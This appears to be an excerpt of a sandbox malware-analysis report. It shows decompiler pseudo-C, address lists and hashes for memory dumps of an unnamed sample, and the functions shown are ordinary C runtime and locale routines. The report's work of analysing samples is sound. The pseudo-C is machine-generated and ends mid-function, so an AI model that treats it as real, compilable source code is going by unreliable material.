                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B773
                                                  • Part of subcall function 00C2B690: _free.LIBCMT ref: 00C2B785
                                                • _free.LIBCMT ref: 00C2C41D
                                                  • Part of subcall function 00C22F9F: HeapFree.KERNEL32(00000000,00000000,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?), ref: 00C22FB5
                                                  • Part of subcall function 00C22F9F: GetLastError.KERNEL32(?,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?,?), ref: 00C22FC7
                                                • _free.LIBCMT ref: 00C2C43F
                                                • _free.LIBCMT ref: 00C2C454
                                                • _free.LIBCMT ref: 00C2C45F
                                                • _free.LIBCMT ref: 00C2C481
                                                • _free.LIBCMT ref: 00C2C494
                                                • _free.LIBCMT ref: 00C2C4A2
                                                • _free.LIBCMT ref: 00C2C4AD
                                                • _free.LIBCMT ref: 00C2C4E5
                                                • _free.LIBCMT ref: 00C2C4EC
                                                • _free.LIBCMT ref: 00C2C509
                                                • _free.LIBCMT ref: 00C2C521
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 9a7dabb0a672a98f577381dbcce9dcdc58d168f66f65914a3a7aec53d4451ff9
                                                • Instruction ID: d96b0acf8432ada7071546b12c06cfdf70f78f0faccc7935e12e8f33bcf83e6a
                                                • Opcode Fuzzy Hash: 9a7dabb0a672a98f577381dbcce9dcdc58d168f66f65914a3a7aec53d4451ff9
                                                • Instruction Fuzzy Hash: 6C317E31604320AFEB21AA78F985B6B73E8EF00310F154529F069D7A95DF71EE80AB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E00C2B78E(void* __edx, char _a4) {
                                                				void* _v8;
                                                				void* _v12;
                                                				signed int _v16;
                                                				intOrPtr* _v20;
                                                				signed int _v24;
                                                				char _v28;
                                                				signed int _t106;
                                                				signed int _t116;
                                                				signed int _t118;
                                                				signed int _t122;
                                                				signed int _t126;
                                                				signed int _t130;
                                                				signed int _t134;
                                                				signed int _t138;
                                                				signed int _t142;
                                                				signed int _t146;
                                                				signed int _t150;
                                                				signed int _t154;
                                                				signed int _t158;
                                                				signed int _t162;
                                                				signed int _t166;
                                                				signed int _t170;
                                                				signed int _t174;
                                                				signed int _t178;
                                                				signed int _t182;
                                                				signed int _t186;
                                                				signed int _t190;
                                                				char _t196;
                                                				char _t209;
                                                				signed int _t212;
                                                				char _t221;
                                                				char _t222;
                                                				void* _t225;
                                                				char* _t227;
                                                				signed int _t228;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				intOrPtr _t234;
                                                				void* _t235;
                                                				void* _t237;
                                                				char* _t258;
                                                
                                                				_t225 = __edx;
                                                				_t209 = _a4;
                                                				_v16 = 0;
                                                				_v28 = _t209;
                                                				_v24 = 0;
                                                				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
                                                					_t235 = E00C22F42(1, 0x50);
                                                					_v8 = _t235;
                                                					E00C22F9F(0);
                                                					if(_t235 != 0) {
                                                						_t228 = E00C22F42(1, 4);
                                                						_v12 = _t228;
                                                						E00C22F9F(0);
                                                						if(_t228 != 0) {
                                                							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
                                                								_t212 = 0x14;
                                                								memcpy(_v8, 0xc42060, _t212 << 2);
                                                								L24:
                                                								_t237 = _v8;
                                                								_t232 = _v16;
                                                								 *_t237 =  *( *(_t209 + 0x88));
                                                								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
                                                								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
                                                								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
                                                								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
                                                								 *_v12 = 1;
                                                								if(_t232 != 0) {
                                                									 *_t232 = 1;
                                                								}
                                                								goto L26;
                                                							}
                                                							_t233 = E00C22F42(1, 4);
                                                							_v16 = _t233;
                                                							E00C22F9F(0);
                                                							if(_t233 != 0) {
                                                								_t234 =  *((intOrPtr*)(_t209 + 0xac));
                                                								_t14 = _t235 + 0xc; // 0xc
                                                								_t116 = E00C27E7B(_t225);
                                                								_t118 = E00C27E7B(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
                                                								_t122 = E00C27E7B(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
                                                								_t126 = E00C27E7B(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
                                                								_v20 = _v8 + 0x1c;
                                                								_t130 = E00C27E7B(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
                                                								_t134 = E00C27E7B(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
                                                								_t138 = E00C27E7B(_t225);
                                                								_t142 = E00C27E7B(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
                                                								_t146 = E00C27E7B(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
                                                								_t150 = E00C27E7B(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
                                                								_t154 = E00C27E7B(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
                                                								_t158 = E00C27E7B(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
                                                								_t162 = E00C27E7B(_t225);
                                                								_t166 = E00C27E7B(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
                                                								_t170 = E00C27E7B(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
                                                								_t174 = E00C27E7B(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
                                                								_t178 = E00C27E7B(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
                                                								_t182 = E00C27E7B(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
                                                								_push(_v8 + 0x44);
                                                								_push(0x17);
                                                								_push(_t234);
                                                								_t186 = E00C27E7B(_t225);
                                                								_t190 = E00C27E7B(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
                                                								if((E00C27E7B(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
                                                									_t227 =  *_v20;
                                                									while(1) {
                                                										_t196 =  *_t227;
                                                										if(_t196 == 0) {
                                                											break;
                                                										}
                                                										_t61 = _t196 - 0x30; // -48
                                                										_t221 = _t61;
                                                										if(_t221 > 9) {
                                                											if(_t196 != 0x3b) {
                                                												L16:
                                                												_t227 = _t227 + 1;
                                                												continue;
                                                											}
                                                											_t258 = _t227;
                                                											do {
                                                												_t222 =  *((intOrPtr*)(_t258 + 1));
                                                												 *_t258 = _t222;
                                                												_t258 = _t258 + 1;
                                                											} while (_t222 != 0);
                                                											continue;
                                                										}
                                                										 *_t227 = _t221;
                                                										goto L16;
                                                									}
                                                									goto L24;
                                                								}
                                                								E00C2B690(_v8);
                                                								E00C22F9F(_v8);
                                                								E00C22F9F(_v12);
                                                								E00C22F9F(_v16);
                                                								goto L4;
                                                							}
                                                							E00C22F9F(_t235);
                                                							E00C22F9F(_v12);
                                                							L7:
                                                							goto L4;
                                                						}
                                                						E00C22F9F(_t235);
                                                						goto L7;
                                                					}
                                                					L4:
                                                					return 1;
                                                				} else {
                                                					_t232 = 0;
                                                					_v12 = 0;
                                                					_t237 = 0xc42060;
                                                					L26:
                                                					_t106 =  *(_t209 + 0x84);
                                                					if(_t106 != 0) {
                                                						asm("lock dec dword [eax]");
                                                					}
                                                					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
                                                						asm("lock xadd [ecx], eax");
                                                						if((_t106 | 0xffffffff) == 0) {
                                                							E00C22F9F( *(_t209 + 0x88));
                                                							E00C22F9F( *((intOrPtr*)(_t209 + 0x7c)));
                                                						}
                                                					}
                                                					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
                                                					 *(_t209 + 0x84) = _t232;
                                                					 *(_t209 + 0x88) = _t237;
                                                					return 0;
                                                				}
                                                			}












































                                                0x00c2b78e
                                                0x00c2b797
                                                0x00c2b79e
                                                0x00c2b7a1
                                                0x00c2b7a4
                                                0x00c2b7ad
                                                0x00c2b7cf
                                                0x00c2b7d3
                                                0x00c2b7d6
                                                0x00c2b7e0
                                                0x00c2b7f3
                                                0x00c2b7f7
                                                0x00c2b7fa
                                                0x00c2b804
                                                0x00c2b816
                                                0x00c2baa8
                                                0x00c2baa9
                                                0x00c2baab
                                                0x00c2bab3
                                                0x00c2bab7
                                                0x00c2babc
                                                0x00c2bac7
                                                0x00c2bad3
                                                0x00c2badf
                                                0x00c2baeb
                                                0x00c2baf1
                                                0x00c2baf5
                                                0x00c2baf7
                                                0x00c2baf7
                                                0x00000000
                                                0x00c2baf5
                                                0x00c2b825
                                                0x00c2b829
                                                0x00c2b82c
                                                0x00c2b836
                                                0x00c2b84a
                                                0x00c2b850
                                                0x00c2b85d
                                                0x00c2b874
                                                0x00c2b88b
                                                0x00c2b8a2
                                                0x00c2b8b2
                                                0x00c2b8bf
                                                0x00c2b8d6
                                                0x00c2b8ed
                                                0x00c2b904
                                                0x00c2b91e
                                                0x00c2b935
                                                0x00c2b94c
                                                0x00c2b963
                                                0x00c2b97d
                                                0x00c2b994
                                                0x00c2b9ab
                                                0x00c2b9c2
                                                0x00c2b9dc
                                                0x00c2b9f3
                                                0x00c2ba00
                                                0x00c2ba01
                                                0x00c2ba03
                                                0x00c2ba0a
                                                0x00c2ba21
                                                0x00c2ba45
                                                0x00c2ba73
                                                0x00c2ba82
                                                0x00c2ba82
                                                0x00c2ba86
                                                0x00000000
                                                0x00000000
                                                0x00c2ba77
                                                0x00c2ba77
                                                0x00c2ba7d
                                                0x00c2ba8c
                                                0x00c2ba81
                                                0x00c2ba81
                                                0x00000000
                                                0x00c2ba81
                                                0x00c2ba8e
                                                0x00c2ba90
                                                0x00c2ba90
                                                0x00c2ba93
                                                0x00c2ba95
                                                0x00c2ba98
                                                0x00000000
                                                0x00c2ba9c
                                                0x00c2ba7f
                                                0x00000000
                                                0x00c2ba7f
                                                0x00000000
                                                0x00c2ba88
                                                0x00c2ba4b
                                                0x00c2ba51
                                                0x00c2ba5a
                                                0x00c2ba63
                                                0x00000000
                                                0x00c2ba68
                                                0x00c2b839
                                                0x00c2b842
                                                0x00c2b80c
                                                0x00000000
                                                0x00c2b80c
                                                0x00c2b807
                                                0x00000000
                                                0x00c2b807
                                                0x00c2b7e2
                                                0x00000000
                                                0x00c2b7b7
                                                0x00c2b7b7
                                                0x00c2b7b9
                                                0x00c2b7bc
                                                0x00c2baf9
                                                0x00c2baf9
                                                0x00c2bb01
                                                0x00c2bb03
                                                0x00c2bb03
                                                0x00c2bb0b
                                                0x00c2bb10
                                                0x00c2bb14
                                                0x00c2bb1c
                                                0x00c2bb24
                                                0x00c2bb2a
                                                0x00c2bb14
                                                0x00c2bb2e
                                                0x00c2bb33
                                                0x00c2bb39
                                                0x00000000
                                                0x00c2bb39

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 9fffdc28aafccd5a00899efae3832c042183327aa4e6a559eb3542f1c26c9808
                                                • Instruction ID: 9f7c26f89c1247b5ece88e11e10f1678f97bf31e684dc1fd83698ecca1f1afc3
                                                • Opcode Fuzzy Hash: 9fffdc28aafccd5a00899efae3832c042183327aa4e6a559eb3542f1c26c9808
                                                • Instruction Fuzzy Hash: 22C12072D40214BFDB20DBA8DC82FEE77F8AB08700F154165FA05FB686D6749E41AB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E00C14D50(void* __ebx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                				intOrPtr _v0;
                                                				signed int _v8;
                                                				signed short _v12;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v36;
                                                				intOrPtr* _v44;
                                                				char _v64;
                                                				char _v72;
                                                				char _v80;
                                                				signed short _v84;
                                                				signed short _v88;
                                                				char _v92;
                                                				char _v96;
                                                				char _v144;
                                                				signed short _v180;
                                                				signed short _v188;
                                                				char _v192;
                                                				signed short _v196;
                                                				intOrPtr* _v200;
                                                				signed short _v204;
                                                				signed short _v208;
                                                				signed short _v212;
                                                				signed short _v216;
                                                				signed short _v220;
                                                				char _v224;
                                                				short _v228;
                                                				signed short _v232;
                                                				char _v236;
                                                				signed short _v240;
                                                				char _v244;
                                                				signed short _v248;
                                                				char _v268;
                                                				intOrPtr _v272;
                                                				intOrPtr* _v280;
                                                				intOrPtr _v284;
                                                				char _v288;
                                                				char _v292;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t89;
                                                				intOrPtr* _t91;
                                                				intOrPtr _t95;
                                                				signed int _t101;
                                                				signed short _t107;
                                                				intOrPtr* _t112;
                                                				void* _t123;
                                                				signed short _t127;
                                                				void* _t160;
                                                				intOrPtr* _t164;
                                                				void* _t169;
                                                				intOrPtr* _t170;
                                                				void* _t175;
                                                				signed int _t176;
                                                				intOrPtr _t181;
                                                				void* _t182;
                                                				intOrPtr _t183;
                                                				signed int _t185;
                                                				intOrPtr* _t186;
                                                				void* _t188;
                                                				void* _t189;
                                                				intOrPtr* _t190;
                                                				intOrPtr* _t191;
                                                				signed int _t195;
                                                				signed int _t197;
                                                				signed int _t198;
                                                
                                                				_t175 = __edx;
                                                				_t160 = __ebx;
                                                				_t197 = (_t195 & 0xfffffff0) - 0xf8;
                                                				_t89 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t89 ^ _t197;
                                                				_t91 = _a4;
                                                				_v200 = _t91;
                                                				_push(_t188);
                                                				_t181 = _a8;
                                                				if(_t91 == 0) {
                                                					L21:
                                                					_pop(_t182);
                                                					_pop(_t189);
                                                					return E00C17193(4, _t160, _v8 ^ _t197, _t175, _t182, _t189);
                                                				} else {
                                                					_t207 =  *_t91;
                                                					if( *_t91 != 0) {
                                                						goto L21;
                                                					} else {
                                                						_t190 = E00C171A1(_t188, _t207, 0x18);
                                                						asm("xorps xmm0, xmm0");
                                                						_t198 = _t197 + 4;
                                                						asm("movups [esi], xmm0");
                                                						asm("movq [esi+0x10], xmm0");
                                                						_t95 =  *((intOrPtr*)(_t181 + 4));
                                                						if(_t95 == 0) {
                                                							_t183 = 0xc3f5cf;
                                                						} else {
                                                							_t183 =  *((intOrPtr*)(_t95 + 0x18));
                                                							if(_t183 == 0) {
                                                								_t183 = _t95 + 0x1c;
                                                							}
                                                						}
                                                						_t164 =  &_v248;
                                                						E00C153B9(_t164, 0);
                                                						_v248 = 0;
                                                						_v244 = 0;
                                                						_v240 = 0;
                                                						_v236 = 0;
                                                						_v232 = 0;
                                                						_v228 = 0;
                                                						_v224 = 0;
                                                						_v220 = 0;
                                                						_v216 = 0;
                                                						_v212 = 0;
                                                						_v208 = 0;
                                                						_v204 = 0;
                                                						_t210 = _t183;
                                                						if(_t183 == 0) {
                                                							E00C15580("bad locale name");
                                                							goto L23;
                                                						} else {
                                                							E00C1580C(_t164,  &_v248, _t183);
                                                							 *(_t190 + 4) = 0;
                                                							 *_t190 = 0xc34ff4;
                                                							E00C1CD18(_t175);
                                                							_t123 = E00C16DEF(_t210,  &_v192);
                                                							asm("movups xmm0, [eax]");
                                                							asm("movups [esp+0xc0], xmm0");
                                                							asm("movups xmm0, [eax+0x10]");
                                                							asm("movups [esp+0xd0], xmm0");
                                                							asm("movq xmm0, [eax+0x20]");
                                                							asm("movq [esp+0xe0], xmm0");
                                                							_v24 =  *((intOrPtr*)(_t123 + 0x28));
                                                							 *(_t190 + 8) = 0;
                                                							 *(_t190 + 0x10) = 0;
                                                							 *(_t190 + 0x14) = 0;
                                                							E00C16DEF(_t210,  &_v144);
                                                							_push(1);
                                                							_push(1);
                                                							_t127 = E00C1B913();
                                                							_t198 = _t198 + 0x18;
                                                							if(_t127 == 0) {
                                                								L23:
                                                								E00C15523(__eflags);
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								_push(0xffffffff);
                                                								_push(0xc32f80);
                                                								_push( *[fs:0x0]);
                                                								_push(_t160);
                                                								_push(_t190);
                                                								_push(_t183);
                                                								_t101 =  *0xc42014; // 0x4fdfcf70
                                                								_push(_t101 ^ _t198);
                                                								 *[fs:0x0] =  &_v268;
                                                								_v272 = _t198 - 0x18;
                                                								_t191 = _t164;
                                                								_v280 = _t191;
                                                								_v284 = 0;
                                                								E00C12F20( &_v292, _t191);
                                                								__eflags = _v288;
                                                								if(_v288 != 0) {
                                                									_v12 = 0;
                                                									_t107 = E00C14020( *((intOrPtr*)( *((intOrPtr*)( *_t191 + 4)) + _t191 + 0x38)), _v0);
                                                									_t176 = 4;
                                                									__eflags = 0xffff - (_t107 & 0x0000ffff);
                                                									_t185 =  ==  ? 4 : 0;
                                                									_v36 = _t185;
                                                									_v12 = 0xffffffff;
                                                								} else {
                                                									_t185 = 4;
                                                									_t176 = 4;
                                                								}
                                                								_t169 =  *((intOrPtr*)( *_t191 + 4)) + _t191;
                                                								__eflags =  *((intOrPtr*)(_t169 + 0x38));
                                                								_t177 =  !=  ? 0 : _t176;
                                                								_t178 = ( !=  ? 0 : _t176) |  *(_t169 + 0xc);
                                                								_t179 = ( !=  ? 0 : _t176) |  *(_t169 + 0xc) | _t185;
                                                								E00C12010(_t160, _t169, ( !=  ? 0 : _t176) |  *(_t169 + 0xc) | _t185, 0);
                                                								_t112 = L00C15921(_t169, __eflags);
                                                								_t186 = _v44;
                                                								__eflags = _t112;
                                                								if(_t112 == 0) {
                                                									E00C13E40();
                                                								}
                                                								_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4)) + _t186 + 0x38));
                                                								__eflags = _t170;
                                                								if(_t170 != 0) {
                                                									 *((intOrPtr*)( *_t170 + 8))();
                                                								}
                                                								 *[fs:0x0] = _v20;
                                                								return _t191;
                                                							} else {
                                                								 *_t127 = 0;
                                                								 *(_t190 + 8) = _t127;
                                                								 *(_t190 + 0x10) = E00C11AB0(_t160, _t183, _t190, "false", 0,  &_v64);
                                                								 *(_t190 + 0x14) = E00C11AB0(_t160, _t183, _t190, "true", 0,  &_v64);
                                                								_v96 = 0x2e;
                                                								asm("xorps xmm0, xmm0");
                                                								_v84 = 0;
                                                								asm("movlpd [esp+0xb0], xmm0");
                                                								E00C15203(_t164,  &_v84,  &_v96, 1,  &_v80,  &_v64);
                                                								 *((short*)(_t190 + 0xc)) = _v84 & 0x0000ffff;
                                                								asm("xorps xmm0, xmm0");
                                                								_v92 = 0x2c;
                                                								_v88 = 0;
                                                								asm("movlpd [esp+0xbc], xmm0");
                                                								E00C15203(_t164,  &_v88,  &_v92, 1,  &_v72,  &_v64);
                                                								 *((short*)(_t190 + 0xe)) = _v88 & 0x0000ffff;
                                                								 *_v196 = _t190;
                                                								E00C15857(_t164,  &_v248);
                                                								_t147 = _v204;
                                                								_t197 = _t198 + 0x44;
                                                								if(_v204 != 0) {
                                                									E00C1CD40(_t147);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t148 = _v188;
                                                								_v180 = 0;
                                                								if(_v188 != 0) {
                                                									E00C1CD40(_t148);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t149 = _v196;
                                                								_v188 = 0;
                                                								if(_v196 != 0) {
                                                									E00C1CD40(_t149);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t150 = _v204;
                                                								_v196 = 0;
                                                								if(_v204 != 0) {
                                                									E00C1CD40(_t150);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t151 = _v212;
                                                								_v204 = 0;
                                                								if(_v212 != 0) {
                                                									E00C1CD40(_t151);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t152 = _v220;
                                                								_v212 = 0;
                                                								if(_v220 != 0) {
                                                									E00C1CD40(_t152);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_v220 = 0;
                                                								E00C15411( &_v224);
                                                								goto L21;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}






































































                                                0x00c14d50
                                                0x00c14d50
                                                0x00c14d56
                                                0x00c14d5c
                                                0x00c14d63
                                                0x00c14d6a
                                                0x00c14d6d
                                                0x00c14d71
                                                0x00c14d73
                                                0x00c14d78
                                                0x00c15030
                                                0x00c1503c
                                                0x00c1503d
                                                0x00c15048
                                                0x00c14d7e
                                                0x00c14d7e
                                                0x00c14d81
                                                0x00000000
                                                0x00c14d87
                                                0x00c14d8e
                                                0x00c14d90
                                                0x00c14d93
                                                0x00c14d96
                                                0x00c14d99
                                                0x00c14d9e
                                                0x00c14da3
                                                0x00c14db1
                                                0x00c14da5
                                                0x00c14da5
                                                0x00c14daa
                                                0x00c14dac
                                                0x00c14dac
                                                0x00c14daa
                                                0x00c14db8
                                                0x00c14dbc
                                                0x00c14dc3
                                                0x00c14dcb
                                                0x00c14dd0
                                                0x00c14dd8
                                                0x00c14ddd
                                                0x00c14de5
                                                0x00c14dea
                                                0x00c14dee
                                                0x00c14df3
                                                0x00c14df7
                                                0x00c14dfb
                                                0x00c14dff
                                                0x00c14e03
                                                0x00c14e05
                                                0x00c1504e
                                                0x00000000
                                                0x00c14e0b
                                                0x00c14e11
                                                0x00c14e16
                                                0x00c14e1d
                                                0x00c14e23
                                                0x00c14e2d
                                                0x00c14e35
                                                0x00c14e38
                                                0x00c14e40
                                                0x00c14e44
                                                0x00c14e4c
                                                0x00c14e51
                                                0x00c14e5d
                                                0x00c14e69
                                                0x00c14e70
                                                0x00c14e77
                                                0x00c14e7e
                                                0x00c14e86
                                                0x00c14e88
                                                0x00c14e8a
                                                0x00c14e8f
                                                0x00c14e94
                                                0x00c15053
                                                0x00c15053
                                                0x00c15058
                                                0x00c15059
                                                0x00c1505a
                                                0x00c1505b
                                                0x00c1505c
                                                0x00c1505d
                                                0x00c1505e
                                                0x00c1505f
                                                0x00c15063
                                                0x00c15065
                                                0x00c15070
                                                0x00c15074
                                                0x00c15075
                                                0x00c15076
                                                0x00c15077
                                                0x00c1507e
                                                0x00c15082
                                                0x00c15088
                                                0x00c1508b
                                                0x00c1508d
                                                0x00c15092
                                                0x00c15099
                                                0x00c1509e
                                                0x00c150a2
                                                0x00c150ad
                                                0x00c150c0
                                                0x00c150cd
                                                0x00c150d2
                                                0x00c150d5
                                                0x00c150d8
                                                0x00c150db
                                                0x00c150a4
                                                0x00c150a4
                                                0x00c150a9
                                                0x00c150a9
                                                0x00c15114
                                                0x00c1511a
                                                0x00c1511d
                                                0x00c15120
                                                0x00c15123
                                                0x00c15126
                                                0x00c1512b
                                                0x00c15130
                                                0x00c15133
                                                0x00c15135
                                                0x00c15139
                                                0x00c15139
                                                0x00c15143
                                                0x00c15147
                                                0x00c15149
                                                0x00c1514d
                                                0x00c1514d
                                                0x00c15155
                                                0x00c15163
                                                0x00c14e9a
                                                0x00c14e9a
                                                0x00c14e9d
                                                0x00c14eb7
                                                0x00c14ed1
                                                0x00c14edb
                                                0x00c14ee3
                                                0x00c14ee6
                                                0x00c14ef1
                                                0x00c14f15
                                                0x00c14f25
                                                0x00c14f29
                                                0x00c14f33
                                                0x00c14f3b
                                                0x00c14f4e
                                                0x00c14f6a
                                                0x00c14f7a
                                                0x00c14f82
                                                0x00c14f89
                                                0x00c14f8e
                                                0x00c14f92
                                                0x00c14f97
                                                0x00c14f9a
                                                0x00c14f9f
                                                0x00c14f9f
                                                0x00c14fa2
                                                0x00c14fa6
                                                0x00c14fb0
                                                0x00c14fb3
                                                0x00c14fb8
                                                0x00c14fb8
                                                0x00c14fbb
                                                0x00c14fbf
                                                0x00c14fc9
                                                0x00c14fcc
                                                0x00c14fd1
                                                0x00c14fd1
                                                0x00c14fd4
                                                0x00c14fd8
                                                0x00c14fe2
                                                0x00c14fe5
                                                0x00c14fea
                                                0x00c14fea
                                                0x00c14fed
                                                0x00c14ff1
                                                0x00c14ffb
                                                0x00c14ffe
                                                0x00c15003
                                                0x00c15003
                                                0x00c15006
                                                0x00c1500a
                                                0x00c15014
                                                0x00c15017
                                                0x00c1501c
                                                0x00c1501c
                                                0x00c15023
                                                0x00c1502b
                                                0x00000000
                                                0x00c1502b
                                                0x00c14e94
                                                0x00c14e05
                                                0x00c14d81

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C14DBC
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C14E11
                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00C14F89
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C1502B
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00C15053
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Locinfo::_Lockit$Concurrency::cancel_current_taskLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                • String ID: ,$.$bad locale name$false$true
                                                • API String ID: 3204333896-3659324578
                                                • Opcode ID: af833045ae1cf2147c92ce56ae0d3e8619dd2e151d1f59e2b804d329811f103c
                                                • Instruction ID: 53ff53e2fe24c51a36964737483c9b74974ea45000c7ed1a65db9640968b3c28
                                                • Opcode Fuzzy Hash: af833045ae1cf2147c92ce56ae0d3e8619dd2e151d1f59e2b804d329811f103c
                                                • Instruction Fuzzy Hash: D18185B1908380DEE720DF64D841BDBB7E4AF96304F044A2DF99997241E774E684DB93
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E00C14070(void* __ebx, void* __edx, void* __edi, unsigned int _a4) {
                                                				signed int _v4;
                                                				char _v8;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v76;
                                                				signed int _v84;
                                                				char _v88;
                                                				char _v92;
                                                				signed int _v96;
                                                				char _v100;
                                                				signed int _v104;
                                                				void* _v112;
                                                				void* _v120;
                                                				intOrPtr _v124;
                                                				signed int _v128;
                                                				signed int _v132;
